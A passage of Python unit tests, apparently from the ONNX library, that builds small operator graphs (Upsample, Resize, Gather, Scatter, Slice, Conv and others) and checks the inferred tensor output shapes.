            [make_node("Constant", [], ['shape'],
                       value=make_tensor('shape', TensorProto.INT64, (2,), (3, 8))),
             make_node("Reshape", ['x', 'shape'], ['y'])],
            [])
        self._assert_inferred(graph, [
            make_tensor_value_info('shape', TensorProto.INT64, (2,)),
            make_tensor_value_info('y', TensorProto.UINT8, (3, 8))])

    def test_upsample(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, (2, 4, 3, 5)),
             ('scales', TensorProto.FLOAT, (4,))],
            [make_node("Upsample", ['x', 'scales'], ['y'])],
            [],
            initializer=[make_tensor('scales', TensorProto.FLOAT, (4,), (1.0, 1.1, 1.3, 1.9))])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (2, 4, 3, 9))],
            opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])

    def test_upsample_raw_data(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, (2, 4, 3, 5)),
             ('scales', TensorProto.FLOAT, (4,))],
            [make_node("Upsample", ['x', 'scales'], ['y'])],
            [],
            initializer=[make_tensor('scales', TensorProto.FLOAT, (4,),
                                     vals=np.array([1.0, 1.1, 1.3, 1.9], dtype='<f4').tobytes(), raw=True)])  # Feed raw bytes (forcing little-endian ordering, per the onnx standard) for test purposes
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (2, 4, 3, 9))],
            opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 9)])

    def test_upsample_raw_data_v7(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, (1, 3, 4, 5))],
            [make_node("Upsample", ['x'], ['y'], scales=[2.0, 1.1, 2.3, 1.9])],
            [])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (2, 3, 9, 9))],
            opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 7)])
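The expected Upsample output shapes in the tests above follow a simple rule: each output dimension is the input dimension times its scale, truncated to an integer. A minimal pure-Python sketch (the truncation behavior is an assumption inferred from the expected values in these tests, e.g. 5 * 1.9 = 9.5 becoming 9):

```python
def scaled_shape(shape, scales):
    # Each output dim is floor(input_dim * scale) for positive dims;
    # int() truncation matches floor here since everything is non-negative.
    return tuple(int(dim * scale) for dim, scale in zip(shape, scales))

print(scaled_shape((2, 4, 3, 5), (1.0, 1.1, 1.3, 1.9)))  # (2, 4, 3, 9)
```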
    def test_expand(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, (3, 1)),
             ('shape', TensorProto.INT64, (3,))],
            [make_node("Expand", ['x', 'shape'], ['y'])],
            [],
            initializer=[make_tensor('shape', TensorProto.INT64, (3,), (2, 1, 6))])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (2, 3, 6))])

    def test_expand_scalar_input(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, ()),
             ('shape', TensorProto.INT64, (2,))],
            [make_node("Expand", ['x', 'shape'], ['y'])],
            [],
            initializer=[make_tensor('shape', TensorProto.INT64, (2,), (4, 8))])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (4, 8))])

    def test_expand_raw_data(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, (3, 1)),
             ('shape', TensorProto.INT64, (2,))],
            [make_node("Expand", ['x', 'shape'], ['y'])],
            [],
            initializer=[make_tensor('shape', TensorProto.INT64, (2,),
                                     vals=np.array([3, 4], dtype='<i8').tobytes(), raw=True)])  # Feed raw bytes (forcing little-endian ordering, per the onnx standard) for test purposes
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (3, 4))])

    def test_resize_size(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, (2, 4, 3, 5)),
             ('roi', TensorProto.FLOAT, (8,)),
             ('scales', TensorProto.FLOAT, (4,)),
             ('sizes', TensorProto.INT64, (4,))],
            [make_node("Resize", ['x', 'roi', 'scales', 'sizes'], ['y'])],
            [],
            initializer=[make_tensor('sizes', TensorProto.INT64, (4,), (3, 5, 6, 7))])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (3, 5, 6, 7))])

    def test_resize_scale(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, (2, 4, 3, 5)),
             ('roi', TensorProto.FLOAT, (8,)),
             ('scales', TensorProto.FLOAT, (4,))],
            [make_node("Resize", ['x', 'roi', 'scales'], ['y'])],
            [],
            initializer=[make_tensor('scales', TensorProto.FLOAT, (4,), (1.0, 1.1, 1.3, 1.9))])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (2, 4, 3, 9))])

    def test_resize_scale_raw_data(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.INT32, (1, 3, 4, 5)),
             ('roi', TensorProto.FLOAT, (8,)),
             ('scales', TensorProto.FLOAT, (4,))],
            [make_node("Resize", ['x', 'roi', 'scales'], ['y'])],
            [],
            initializer=[make_tensor('scales', TensorProto.FLOAT, (4,),
                                     vals=np.array([2.0, 1.1, 2.3, 1.9], dtype='<f4').tobytes(), raw=True)])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.INT32, (2, 3, 9, 9))])

    def test_shape(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (2, 4, 3))],
            [make_node("Shape", ['x'], ['y'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, (3,))])

    def test_size(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (2, 4, 3))],
            [make_node("Size", ['x'], ['y'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.INT64, ())])

    def test_gather(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (4, 3)),
             ('i', TensorProto.INT64, (2,))],
            [make_node("Gather", ['x', 'i'], ['y'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3))])  # type: ignore

    def test_gather_axis1(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (4, 3, 5)),
             ('i', TensorProto.INT64, (1, 2))],
            [make_node("Gather", ['x', 'i'], ['y'], axis=1)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 1, 2, 5))])  # type: ignore

    def test_gather_into_scalar(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (3,)),
             ('i', TensorProto.INT64, ())],
            [make_node("Gather", ['x', 'i'], ['y'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, ())])

    def test_gather_elements(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (2, 2)),
             ('i', TensorProto.INT64, (2, 2))],
            [make_node("GatherElements", ['x', 'i'], ['y'], axis=1)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2))])  # type: ignore

    def test_gather_elements_axis0(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (3, 3)),
             ('i', TensorProto.INT64, (2, 3))],
            [make_node("GatherElements", ['x', 'i'], ['y'], axis=0)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3))])  # type: ignore

    def test_scatter(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (3, 3)),
             ('i', TensorProto.INT64, (2, 3)),
             ('u', TensorProto.FLOAT, (2, 3))],
            [make_node("Scatter", ['x', 'i', 'u'], ['y'])],
            [])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.FLOAT, (3, 3))],
            opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 10)])  # type: ignore

    def test_scatter_axis1(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (1, 5)),
             ('i', TensorProto.INT64, (1, 2)),
             ('u', TensorProto.FLOAT, (1, 2))],
            [make_node("Scatter", ['x', 'i', 'u'], ['y'], axis=1)],
            [])
        self._assert_inferred(
            graph,
            [make_tensor_value_info('y', TensorProto.FLOAT, (1, 5))],
            opset_imports=[helper.make_opsetid(ONNX_DOMAIN, 10)])  # type: ignore

    def test_scatter_elements(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (3, 3)),
             ('i', TensorProto.INT64, (2, 3)),
             ('u', TensorProto.FLOAT, (2, 3))],
            [make_node("ScatterElements", ['x', 'i', 'u'], ['y'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, 3))])  # type: ignore

    def test_scatter_elements_axis1(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (1, 5)),
             ('i', TensorProto.INT64, (1, 2)),
             ('u', TensorProto.FLOAT, (1, 2))],
            [make_node("ScatterElements", ['x', 'i', 'u'], ['y'], axis=1)],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 5))])  # type: ignore

    def test_scatternd(self):  # type: () -> None
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (4, 5, 6)),
             ('indices', TensorProto.INT64, (3, 3, 2)),
             ('updates', TensorProto.FLOAT, (3, 3, 6))],
            [make_node("ScatterND", ['x', 'indices', 'updates'], ['y'])],
            [])
        self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (4, 5, 6))])  # type: ignore

    def test_scatternd_noshape(self):  # type: () -> None
        # The shape of 'x_reshaped' cannot be inferred, since it is the output of a dynamic reshape.
        # Thus the shape of 'y' is also None.
        graph = self._make_graph(
            [('x', TensorProto.FLOAT, (4, 5, 6)),
             ('indices', TensorProto.INT64, (3, 3, 2)),
             ('updates', TensorProto.FLOAT, (3, 3, 6)),
             ('shape', TensorProto.INT64, (2,))],
            [make_node("Reshape", ['x', 'shape'], ['x_reshaped']),
             make_node("ScatterND", ['x_reshaped', 'indices', 'updates'], ['y'])],
            [])
        self._assert_inferred(graph, [
            make_tensor_value_info('x_reshaped', TensorProto.FLOAT, None),
            make_tensor_value_info('y', TensorProto.FLOAT, None)])  # type: ignore
def test_squeeze(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, 3, 1, 1, 2, 1)),
('axes', TensorProto.INT64, (4,))],
[make_node('Squeeze', ['x', 'axes'], 'y')],
[],
initializer=[make_tensor('axes', TensorProto.INT64, (4,), (0, 2, 3, 5))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (3, 2))])
def test_unsqueeze_regular(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('axes', TensorProto.INT64, (4,))],
[make_node('Unsqueeze', ['x', 'axes'], 'y')],
[],
initializer=[make_tensor('axes', TensorProto.INT64, (4,), (0, 1, 3, 5))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 1, 3, 1, 2, 1))])
def test_unsqueeze_unsorted_axes(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('axes', TensorProto.INT64, (2,))],
[make_node('Unsqueeze', ['x', 'axes'], 'y')],
[],
initializer=[make_tensor('axes', TensorProto.INT64, (2,), (4, 0))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 3, 4, 5, 1))])
def test_unsqueeze_negative_axes(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5)),
('axes', TensorProto.INT64, (2,))],
[make_node('Unsqueeze', ['x', 'axes'], 'y')],
[],
initializer=[make_tensor('axes', TensorProto.INT64, (2,), (0, -1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 3, 4, 5, 1))])
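The three Unsqueeze tests above insert size-1 dims at the given positions in the *output* shape, accepting unsorted and negative axes. numpy's `expand_dims` (which accepts a tuple of axes since numpy 1.18) follows the same rule, so it can reproduce the inferred shapes:

```python
import numpy as np

x = np.zeros((3, 4, 5), dtype=np.float32)
# Unsorted axes (4, 0): new dims land at output positions 0 and 4.
unsorted = np.expand_dims(x, axis=(4, 0)).shape
# Negative axis -1 counts from the back of the rank-5 output.
negative = np.expand_dims(x, axis=(0, -1)).shape
```

Both calls yield `(1, 3, 4, 5, 1)`, matching the inferred shapes in the two tests.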
def test_slice_without_input_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)), ('starts', TensorProto.INT64, (1,)), ('ends', TensorProto.INT64, (1,))],
[make_node('Slice', ['x', 'starts', 'ends'], ['y'])],
[])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, None)])
def test_slice_with_input_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)), ('starts', TensorProto.INT64, (2, )), ('ends', TensorProto.INT64, (2, ))],
[make_node('Slice', ['x', 'starts', 'ends'], ['y'])],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2, ),
vals=np.array([1, 0], dtype='<i8').tobytes(), raw=True), # Feed raw bytes (forcing little-endian byte order, as the ONNX standard requires) for test purposes
make_tensor('ends', TensorProto.INT64, (2, ), (2, 2))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 2))])
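The raw-bytes initializer above exists because `TensorProto.raw_data` is defined to be little-endian regardless of the host; numpy's explicit `'<i8'` dtype forces that byte order. A small round-trip sketch of the encoding:

```python
import numpy as np

# Encode the starts values exactly as the test does.
starts = np.array([1, 0], dtype='<i8')
raw = starts.tobytes()
# Decoding with the same little-endian dtype recovers the values,
# independent of the host machine's native endianness.
decoded = np.frombuffer(raw, dtype='<i8')
```

Two int64 values occupy 16 bytes, and the round trip gives back `[1, 0]`.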
def test_slice_with_input_shape_containing_dim_params(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (1, 'a', 1)),
('starts', TensorProto.INT64, (3,)),
('ends', TensorProto.INT64, (3,))],
[make_node('Slice', ['x', 'starts', 'ends'], ['y'])],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (3,), (0, 0, 0)),
make_tensor('ends', TensorProto.INT64, (3,), (1, 1, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, None, 1))]) # type: ignore
def test_slice_with_input_shape_steps(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (5, 6, 7)),
('starts', TensorProto.INT64, (3,)),
('ends', TensorProto.INT64, (3,)),
('axes', TensorProto.INT64, (None,)),
('steps', TensorProto.INT64, (3,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes', 'steps'], ['y'])],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (3,), (1, 0, 0)),
make_tensor('ends', TensorProto.INT64, (3,), (2, 6, 6)),
make_tensor('steps', TensorProto.INT64, (3,), (1, 4, 3))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 2, 2))])
def test_slice_with_input_shape_axes(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 6, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,)),
('steps', TensorProto.INT64, (None,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes', 'steps'], ['y'])],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (2, 2)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 2))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (1, 6, 2))])
def test_slice_unsorted_axes(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (2, 2)),
make_tensor('axes', TensorProto.INT64, (2,), (1, 0))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 1))]) # can handle unsorted axes
def test_slice_giant_number(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (200, 22000)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2))])
def test_slice_giant_step(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,)),
('steps', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes', 'steps'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (200, 200)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 1)),
make_tensor('steps', TensorProto.INT64, (2,), (1, 200))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 1))])
def test_slice_negative_end(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT64, (2,), (200, -1)), # a negative end counts from the end of the dimension (here end = 2 - 1 = 1)
make_tensor('axes', TensorProto.INT64, (2,), (0, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 1))]) # type: ignore
def test_slice_negative_start(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 2)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, -2)), # a negative start counts from the end of the dimension (here start = 2 - 2 = 0)
make_tensor('ends', TensorProto.INT64, (2,), (200, 3)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 2))]) # type: ignore
def test_slice_negative_step(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4)),
('starts', TensorProto.INT64, (2,)),
('ends', TensorProto.INT64, (2,)),
('axes', TensorProto.INT64, (2,)),
('steps', TensorProto.INT64, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes', 'steps'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (2,), (1, 4)), # start=4 is clamped to 3 because the step is negative
make_tensor('ends', TensorProto.INT64, (2,), (200, 0)),
make_tensor('axes', TensorProto.INT64, (2,), (0, 1)),
make_tensor('steps', TensorProto.INT64, (2,), (1, -1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, (2, 3))]) # type: ignore
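The three negative-value Slice tests above follow ordinary Python/numpy slice semantics: a negative start or end counts from the back of the dimension, and with a negative step the start is clamped to `dim - 1` (here 4 becomes 3). numpy slicing reproduces the inferred shapes directly:

```python
import numpy as np

# test_slice_negative_step: starts=(1, 4), ends=(200, 0), steps=(1, -1) on (3, 4)
x = np.zeros((3, 4), dtype=np.float32)
neg_step = x[1:200:1, 4:0:-1]   # axis 1 visits indices 3, 2, 1

# test_slice_negative_end: end=-1 on a size-2 dim means 2 - 1 = 1
y = np.zeros((3, 2), dtype=np.float32)
neg_end = y[1:200, 0:-1]

# test_slice_negative_start: start=-2 on a size-2 dim means 2 - 2 = 0
neg_start = y[1:200, -2:3]
```

The resulting shapes are `(2, 3)`, `(2, 1)`, and `(2, 2)`, matching the inferred values.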
def test_slice_variable_copy(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, ("a", 2)),
('starts', TensorProto.INT64, (1,)),
('ends', TensorProto.INT64, (1,)),
('axes', TensorProto.INT64, (1,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT64, (1,), (1,)),
make_tensor('ends', TensorProto.INT64, (1,), (200,)),
make_tensor('axes', TensorProto.INT64, (1,), (1,))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.FLOAT, ("a", 1))]) # type: ignore
def test_slice_variable_input_types(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.DOUBLE, (3, 2)),
('starts', TensorProto.INT32, (2,)),
('ends', TensorProto.INT32, (2,)),
('axes', TensorProto.INT32, (2,))],
[make_node('Slice', ['x', 'starts', 'ends', 'axes'], 'y')],
[],
initializer=[make_tensor('starts', TensorProto.INT32, (2,), (1, 0)),
make_tensor('ends', TensorProto.INT32, (2,), (200, 22000)),
make_tensor('axes', TensorProto.INT32, (2,), (0, 1))])
self._assert_inferred(graph, [make_tensor_value_info('y', TensorProto.DOUBLE, (2, 2))])
def test_conv(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (3, 4, 5, 6, 7)),
('y', TensorProto.FLOAT, (5, 4, 2, 4, 3))],
[make_node('Conv', ['x', 'y'], 'z', pads=[0, 1, 1, 0, 0, 1], dilations=[1, 2, 2], strides=[1, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (3, 5, 4, 1, 3))])
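The Conv case above can be hand-checked with the standard output-size formula, `out = floor((in + pad_begin + pad_end - dilation*(kernel-1) - 1) / stride) + 1`. A sketch using a hypothetical `conv_out_dim` helper (not an onnx API):

```python
def conv_out_dim(size, kernel, pad_begin, pad_end, stride=1, dilation=1):
    # Effective kernel extent once dilation is applied.
    effective_kernel = dilation * (kernel - 1) + 1
    return (size + pad_begin + pad_end - effective_kernel) // stride + 1

# Spatial input dims (5, 6, 7), kernel (2, 4, 3),
# pads=[0, 1, 1, 0, 0, 1] listed as all begins then all ends.
spatial = [
    conv_out_dim(5, 2, 0, 0, stride=1, dilation=1),
    conv_out_dim(6, 4, 1, 0, stride=1, dilation=2),
    conv_out_dim(7, 3, 1, 1, stride=2, dilation=2),
]
```

This yields `[4, 1, 3]`, i.e. the `(3, 5, 4, 1, 3)` shape once batch 3 and output channels 5 are prepended.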
def test_conv_1d_simple(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (50, 4, 2))],
[make_node('Conv', ['x', 'y'], 'z', dilations=[1])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 4))])
def test_conv_dilations(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 8, 8, 8)),
('y', TensorProto.FLOAT, (50, 4, 3, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', dilations=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 6, 4, 2))])
def test_conv_strides(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 8, 8, 8)),
('y', TensorProto.FLOAT, (50, 4, 3, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', strides=[1, 2, 3])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 6, 3, 2))])
def test_conv_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, 3, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 6, 6, 6))])
def test_conv_auto_pad(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, 4, 3, 2))],
[make_node('Conv', ['x', 'y'], 'z', auto_pad='SAME_UPPER')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 7, 6, 4))])
def test_conv_auto_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, 4, 3, 2))],
[make_node('Conv', ['x', 'y'], 'z', auto_pad='SAME_UPPER', strides=[2, 2, 1])],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 4, 3, 4))])
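With `auto_pad='SAME_UPPER'` the padding is chosen so the spatial output size depends only on the stride: `out = ceil(in / stride)`, independent of the kernel. A quick check against the strided test above:

```python
import math

spatial_in = (7, 6, 4)
strides = (2, 2, 1)
# SAME_UPPER pads just enough that out = ceil(in / stride) per spatial axis.
same_upper = [math.ceil(i / s) for i, s in zip(spatial_in, strides)]
```

This gives `[4, 3, 4]`, matching the inferred `(30, 50, 4, 3, 4)`; with the default stride of 1 (as in the unstrided and dilated tests) the spatial dims are simply preserved.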
def test_conv_auto_pad_dilation(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 65, 64, 63)),
('y', TensorProto.FLOAT, (50, 4, 4, 3, 2))],
[make_node('Conv', ['x', 'y'], 'z', auto_pad='SAME_UPPER', dilations=[2, 3, 4])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 65, 64, 63))])
def test_conv_group(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 8, 8, 8)),
('y', TensorProto.FLOAT, (4, 1, 8, 8, 8))],
[make_node('Conv', ['x', 'y'], 'z', group=4)],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 4, 1, 1, 1))])
def test_conv_only_one_pos(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (50, 4, 5))],
[make_node('Conv', ['x', 'y'], 'z', strides=[2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, 1))])
def test_conv_partial_missing_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, None, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, 3, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 50, None, 6, 6))]) # type: ignore
def test_conv_partial_missing_weight_shape(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4)),
('y', TensorProto.FLOAT, (50, 4, None, 3, 3))],
[make_node('Conv', ['x', 'y'], 'z', pads=[1, 1, 2, 0, 1, 2])],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, None)])
def test_average_pool_auto_pads(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 7, 6, 4))],
[make_node('AveragePool', ['x'], 'z', auto_pad='SAME_UPPER', kernel_shape=[4, 3, 2], strides=[2, 2, 1])],
[])
self._assert_inferred(
graph,
[make_tensor_value_info('z', TensorProto.FLOAT, (30, 4, 4, 3, 4))])
def test_relu(self): # type: () -> None
self._identity_prop('Relu')
def test_identity(self): # type: () -> None
self._identity_prop('Identity')
def test_identity_sequence(self): # type: () -> None
graph = self._make_graph(
[('input1', TensorProto.FLOAT, (2, 3, 4)),
('input2', TensorProto.FLOAT, (2, 3, 4)),
('input3', TensorProto.FLOAT, (2, 5, 4))],
[make_node('SequenceConstruct', ['input1', 'input2', 'input3'], ['in_sequence']),
make_node('Identity', ['in_sequence'], ['output_sequence'])],
[])
self._assert_inferred(
graph,
[make_sequence_value_info('in_sequence', TensorProto.FLOAT, (2, None, 4)), # type: ignore
make_sequence_value_info('output_sequence', TensorProto.FLOAT, (2, None, 4))]) # type: ignore
def test_add(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (30, 4, 5))],
[make_node('Add', ['x', 'y'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 4, 5))])
def test_pow(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.FLOAT, (30, 4, 5)),
('y', TensorProto.FLOAT, (30, 4, 5))],
[make_node('Pow', ['x', 'y'], 'z')],
[])
self._assert_inferred(graph, [make_tensor_value_info('z', TensorProto.FLOAT, (30, 4, 5))])
def test_bitshift(self): # type: () -> None
graph = self._make_graph(
[('x', TensorProto.UINT32, (2, 3, 1)),
('y', TensorProto.UINT32, (2, 3, 1))],
[make_node('BitShift', ['x', 'y'], 'z', direction="RIGHT")],
[])
